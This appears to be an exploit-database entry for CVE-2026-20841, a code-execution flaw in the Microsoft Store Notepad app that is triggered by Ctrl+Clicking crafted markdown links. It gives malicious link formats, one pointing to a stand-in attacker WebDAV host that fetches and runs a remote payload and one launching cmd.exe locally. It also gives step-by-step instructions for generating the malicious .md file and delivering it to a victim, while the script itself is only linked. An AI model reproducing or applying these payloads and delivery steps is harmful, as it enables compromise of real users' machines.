# Exploit Title: Windows Notepad App (Store Version) - Remote/Local Code Execution via Markdown Link
# Date: 2026-02-26
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://apps.microsoft.com/detail/9msmlrh6lzf3
# Version: Windows Notepad App versions 11.0.0 through 11.2510.14.0
# Tested on: Windows 11 (Notepad 11.2510.14.0)
# CVE: CVE-2026-20841
# CVSS: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Description:
The Windows Notepad App (Microsoft Store version) fails to properly validate
protocol handlers in markdown links. When a user Ctrl+Click on a crafted link
in a .md file, Notepad passes the raw URI to ShellExecuteExW() without
sufficient filtering . This allows execution of arbitrary binaries
in TWO distinct attack scenarios:
1. REMOTE CODE EXECUTION (RCE) - Network Scenario:
- Attacker hosts payload on WebDAV/SMB share
- Link format: `file:///\\attacker@port\DavWWWRoot\payload.py`
- Windows fetches and executes remote payload when clicked
- Confirmed by Microsoft: "load and execute remote files"
2. LOCAL CODE EXECUTION - Offline Scenario:
- Attacker with local access executes system binaries
- Link format: `file://C:/Windows/System32/cmd.exe`
- No network required - payloads already on disk
Affected versions: 11.0.0 through 11.2510.14.0
Fixed in: 11.2510.14.0+ (requires manual Store update)
Note: The patch adds a warning dialog but does NOT block execution
Usage:
1. Modify the attacker IP in remote payloads to your machine
2. Run the script to generate malicious .md file
3. Host payloads on WebDAV/SMB server (for remote attack)
4. Deliver .md file to target
5. Victim opens in vulnerable Notepad and Ctrl+Click any link
# Exploit:
[href](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2026/CVE-2026-20841/exploit.md)
